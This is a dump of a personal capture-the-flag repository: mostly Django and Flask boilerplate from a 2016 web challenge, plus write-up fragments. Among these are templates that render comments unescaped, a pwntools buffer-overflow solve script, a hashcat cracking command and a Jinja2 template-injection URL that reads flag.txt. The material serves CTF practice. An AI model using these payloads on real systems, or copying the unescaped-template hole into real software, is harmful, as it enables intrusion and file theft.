https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/app/__init__.py
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/app/admin.py:
--------------------------------------------------------------------------------
1 | from django.contrib import admin
2 |
3 | # Register your models here.
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/app/tests.py:
--------------------------------------------------------------------------------
1 | from django.test import TestCase
2 |
3 | # Create your tests here.
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/comments/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/comments/__init__.py
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/comments/admin.py:
--------------------------------------------------------------------------------
1 | from django.contrib import admin
2 |
3 | # Register your models here.
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/comments/tests.py:
--------------------------------------------------------------------------------
1 | from django.test import TestCase
2 |
3 | # Create your tests here.
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/project/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/project/__init__.py
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/shop/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/shop/__init__.py
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/shop/admin.py:
--------------------------------------------------------------------------------
1 | from django.contrib import admin
2 |
3 | # Register your models here.
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/shop/tests.py:
--------------------------------------------------------------------------------
1 | from django.test import TestCase
2 |
3 | # Create your tests here.
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/Challenge Sources/shop-server/shop/urls.py:
--------------------------------------------------------------------------------
1 | from django.conf.urls import include, url, patterns
2 | from views import *
3 |
4 |
5 | urlpatterns = patterns('',
6 | url(r'^$', 'shop.views.index', name='shop_index'),
7 | )
8 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/django-shop/django-shop1.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/django-shop/django-shop1.zip
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/django-shop/django-shop1/source.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/django-shop/django-shop1/source.zip
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/django-shop/django-shop2.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/django-shop/django-shop2.zip
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/flask-3pt/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/flask-3pt/templates/comment.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {{ flag1 }}
6 | {{ comment|safe }}
7 |
8 |
9 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/flask/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/flask/templates/comment.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | {{ comment|safe }}
5 |
6 |
7 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/info.txt:
--------------------------------------------------------------------------------
1 | flag1:
2 | APACTF{okay,got_it,you_know_how_xss_works...} # Removed from challenges
3 |
4 | flag2:
5 | APACTF{okay,got_it,you_know_how_to_forge_requests...}
6 |
7 | flag3:
8 | APACTF{!f_there_were_no_character_limits_you_m4y_even_get_a_remote_sh3ll_on_my_server!}
9 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/.idea/.name:
--------------------------------------------------------------------------------
1 | project
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/.idea/encodings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/.idea/scopes/scope_settings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/__init__.py
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/__init__.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/admin.py:
--------------------------------------------------------------------------------
1 | from django.contrib import admin
2 |
3 | # Register your models here.
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/admin.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/admin.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/forms.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/forms.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/migrations/0001_initial.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/migrations/0001_initial.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/migrations/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/migrations/__init__.py
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/migrations/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/migrations/__init__.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/models.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/models.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/tests.py:
--------------------------------------------------------------------------------
1 | from django.test import TestCase
2 |
3 | # Create your tests here.
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/views.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/views.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/__init__.py
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/__init__.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/admin.py:
--------------------------------------------------------------------------------
1 | from django.contrib import admin
2 |
3 | # Register your models here.
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/admin.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/admin.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/migrations/0001_initial.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/migrations/0001_initial.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/migrations/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/migrations/__init__.py
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/migrations/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/migrations/__init__.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/models.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/models.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/tests.py:
--------------------------------------------------------------------------------
1 | from django.test import TestCase
2 |
3 | # Create your tests here.
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/urls.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/urls.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/views.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/views.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/db.sqlite3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/db.sqlite3
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/manage.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | import os
3 | import sys
4 |
5 | if __name__ == "__main__":
6 | os.environ.setdefault("DJANGO_SETTINGS_MODULE", "project.settings")
7 |
8 | from django.core.management import execute_from_command_line
9 |
10 | execute_from_command_line(sys.argv)
11 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/project/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/project/__init__.py
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/project/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/project/__init__.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/project/settings.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/project/settings.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/project/urls.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/project/urls.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/project/wsgi.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/project/wsgi.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/shop/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/shop/__init__.py
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/shop/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/shop/__init__.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/shop/admin.py:
--------------------------------------------------------------------------------
1 | from django.contrib import admin
2 |
3 | # Register your models here.
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/shop/admin.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/shop/admin.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/shop/models.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/shop/models.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/shop/tests.py:
--------------------------------------------------------------------------------
1 | from django.test import TestCase
2 |
3 | # Create your tests here.
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/shop/urls.py:
--------------------------------------------------------------------------------
1 | from django.conf.urls import include, url, patterns
2 | from views import *
3 |
4 |
5 | urlpatterns = patterns('',
6 | url(r'^$', 'shop.views.index', name='shop_index'),
7 | )
8 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/shop/urls.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/shop/urls.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/shop/views.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/shop/views.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/README.md:
--------------------------------------------------------------------------------
1 | APA-IUTcert CTF...
2 |
--------------------------------------------------------------------------------
/Challenges/README.md:
--------------------------------------------------------------------------------
1 | Challenges I Developed.
2 |
--------------------------------------------------------------------------------
/Online-CTF/pwnable.kr-writeups/Toddler's Bottle/bof/bof:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Online-CTF/pwnable.kr-writeups/Toddler's Bottle/bof/bof
--------------------------------------------------------------------------------
/Online-CTF/pwnable.kr-writeups/Toddler's Bottle/bof/solve.py:
--------------------------------------------------------------------------------
1 | from pwn import *
2 |
3 |
4 | r = process('./bof')
5 | # r = remote('pwnable.kr', 9000)
6 | r.readuntil('overflow me : ')
7 | #
8 | payload = 'A'*44 + p32(0xcafebabe)
9 | # payload = 'fdsfds'
10 | r.sendline(payload)
11 |
12 | r.interactive()
13 |
14 |
--------------------------------------------------------------------------------
/Online-CTF/ringzer0team.com/coding/10-read_me_if_you_can/README.md:
--------------------------------------------------------------------------------
1 | #Description
2 |
3 | You have 2 seconds to parse the word.
4 |
5 | Send the answer back using https://ringzer0team.com/challenges/17/[your_string]
6 |
--------------------------------------------------------------------------------
/Online-CTF/ringzer0team.com/coding/10-read_me_if_you_can/captcha.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Online-CTF/ringzer0team.com/coding/10-read_me_if_you_can/captcha.png
--------------------------------------------------------------------------------
/Online-CTF/ringzer0team.com/coding/11-hash_breaker_reloaded_again/README.md:
--------------------------------------------------------------------------------
1 | #Description
2 |
3 | You have 3 seconds to break this hash
4 |
5 | Send the answer back using https://ringzer0team.com/challenges/159/[clear_text]
6 |
7 | ```
8 | ----- BEGIN HASH -----
9 | a9f9225df475266767afc0375ff09378ccc09e5c
10 | ----- END HASH -----
11 | ```
--------------------------------------------------------------------------------
/Online-CTF/ringzer0team.com/coding/4-i_hate_mathematics/README.md:
--------------------------------------------------------------------------------
1 | #Description
2 |
3 | You have 2 seconds to send the answer
4 |
5 | Send the answer back using https://ringzer0team.com/challenges/32/[answer]
6 |
7 | ```
8 | ----- BEGIN MESSAGE -----
9 | 3532 + 0x1a08 - 10010110011111 = ?
10 | ----- END MESSAGE -----
11 | ```
--------------------------------------------------------------------------------
/Online-CTF/ringzer0team.com/coding/6-hash_breaker/README.md:
--------------------------------------------------------------------------------
1 | #Description
2 |
3 | You have 3 seconds to break this hash
4 |
5 | Send the answer back using https://ringzer0team.com/challenges/56/[clear_text]
6 |
7 | ```
8 | ----- BEGIN HASH -----
9 | b3757e73b4bfb806a01e23d01fc2149b99a21b9e
10 | ----- END HASH -----
11 | ```
--------------------------------------------------------------------------------
/Wiki/README.md:
--------------------------------------------------------------------------------
1 |
2 |
3 | ### Learning Websites
4 |
5 | https://0xdf.gitlab.io/
6 |
--------------------------------------------------------------------------------
/Writeups/2015/hack.dat.kiwi/README.md:
--------------------------------------------------------------------------------
1 | Solutions
--------------------------------------------------------------------------------
/Writeups/2015/seccon/SecconWars/images/steg-1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2015/seccon/SecconWars/images/steg-1.jpg
--------------------------------------------------------------------------------
/Writeups/2015/seccon/SecconWars/images/steg-2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2015/seccon/SecconWars/images/steg-2.jpg
--------------------------------------------------------------------------------
/Writeups/2016/Plaid/rabbit/util.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/Plaid/rabbit/util.pyc
--------------------------------------------------------------------------------
/Writeups/2016/SharifCTF/Cryp1/Ciphertext:
--------------------------------------------------------------------------------
1 | AaY--rpyfneJBeaaX0n-,ZZcs-uXeeSVJ-sh2tioaZ}slrg,-ciE-anfGt.-eCIyss-TzprttFliora{GcouhQIadctm0ltt-FYluuezTyorZ-
2 |
--------------------------------------------------------------------------------
/Writeups/2016/SharifCTF/Web3-oldpersian/images/captcha_main.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/SharifCTF/Web3-oldpersian/images/captcha_main.jpg
--------------------------------------------------------------------------------
/Writeups/2016/SharifCTF/Web3-oldpersian/images/main_page.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/SharifCTF/Web3-oldpersian/images/main_page.jpg
--------------------------------------------------------------------------------
/Writeups/2016/SharifCTF/Web3-oldpersian/images/sample_1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/SharifCTF/Web3-oldpersian/images/sample_1.jpg
--------------------------------------------------------------------------------
/Writeups/2016/SharifCTF/Web3-oldpersian/images/sample_2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/SharifCTF/Web3-oldpersian/images/sample_2.jpg
--------------------------------------------------------------------------------
/Writeups/2016/SharifCTF/Web3-oldpersian/images/sample_3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/SharifCTF/Web3-oldpersian/images/sample_3.jpg
--------------------------------------------------------------------------------
/Writeups/2016/SharifCTF/Web3-oldpersian/images/sample_4.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/SharifCTF/Web3-oldpersian/images/sample_4.jpg
--------------------------------------------------------------------------------
/Writeups/2016/SharifCTF/Web3-oldpersian/images/trans.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/SharifCTF/Web3-oldpersian/images/trans.png
--------------------------------------------------------------------------------
/Writeups/2016/abctf/cryptography/yummy/baconian.bmp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/abctf/cryptography/yummy/baconian.bmp
--------------------------------------------------------------------------------
/Writeups/2016/abctf/programming/qset/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/abctf/programming/qset/__init__.py
--------------------------------------------------------------------------------
/Writeups/2016/abctf/programming/qset/interpreter.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/abctf/programming/qset/interpreter.pyc
--------------------------------------------------------------------------------
/Writeups/2016/sCTF/Algorithmic/Tracking/info:
--------------------------------------------------------------------------------
1 | Global Positioning Systems (GPS) use satellites to trilaterate a device's position on Planet Earth. You will need to use a very similar method to solve this problem. Download the description and input file to get started!
--------------------------------------------------------------------------------
/Writeups/2016/sCTF/cryptography/Verticode/code1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/sCTF/cryptography/Verticode/code1.png
--------------------------------------------------------------------------------
/Writeups/2016/sCTF/cryptography/Verticode/image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/sCTF/cryptography/Verticode/image.png
--------------------------------------------------------------------------------
/Writeups/2016/sCTF/cryptography/Vertinet/description:
--------------------------------------------------------------------------------
1 | This problem follows the same specifications as the previous Verticode problem, except that you have to solve many of them by developing a client to communicate with the server available at problems1.2016q1.sctf.io:50000. Good luck.
--------------------------------------------------------------------------------
/Writeups/2016/sCTF/cryptography/Vertinet/image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/sCTF/cryptography/Vertinet/image.png
--------------------------------------------------------------------------------
/Writeups/2016/tuctf/crypt/magic-image/encrypted.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/tuctf/crypt/magic-image/encrypted.png
--------------------------------------------------------------------------------
/Writeups/2016/tuctf/crypt/magic-image/output.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/tuctf/crypt/magic-image/output.png
--------------------------------------------------------------------------------
/Writeups/2016/tuctf/misc/the nack/file.pcapng:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/tuctf/misc/the nack/file.pcapng
--------------------------------------------------------------------------------
/Writeups/2016/tuctf/misc/the nack/output.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/tuctf/misc/the nack/output.gif
--------------------------------------------------------------------------------
/Writeups/2018/BSides Delhi CTF/Crypt100-TileMate/ci.pher.text:
--------------------------------------------------------------------------------
1 | 9efd0a15d40981b2748897817a1588d57f0812888d7f0859eb7fa23124a17f8b6f24a06e134cacd2
--------------------------------------------------------------------------------
/Writeups/2021/CSAW/crack me/README.md:
--------------------------------------------------------------------------------
1 | hashcat -m 1420 -a 0 hash.txt Downloads/rockyou.txt
2 |
3 | hash.txt:
4 | a60458d2180258d47d7f7bef5236b33e86711ac926518ca4545ebf24cdc0b76c:sha256
5 |
6 |
--------------------------------------------------------------------------------
/Writeups/2021/CSAW/exploit1/password_checker:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2021/CSAW/exploit1/password_checker
--------------------------------------------------------------------------------
/Writeups/2021/CSAW/web1/solve.txt:
--------------------------------------------------------------------------------
1 | http://web.chal.csaw.io:5000/submit?value={{%22%22|attr(%22\x5f\x5fclass\x5f\x5f%22)|attr(%22mro%22)()|attr(%22\x5f\x5fgetitem\x5f\x5f%22)(2)|attr(%22\x5f\x5fsubclasses\x5f\x5f%22)()|attr(%22\x5f\x5fgetitem\x5f\x5f%22)(40)(%22flag.txt%22)|attr(%22read%22)()}}&class=class&usc=base&und=_
2 |
3 |
--------------------------------------------------------------------------------
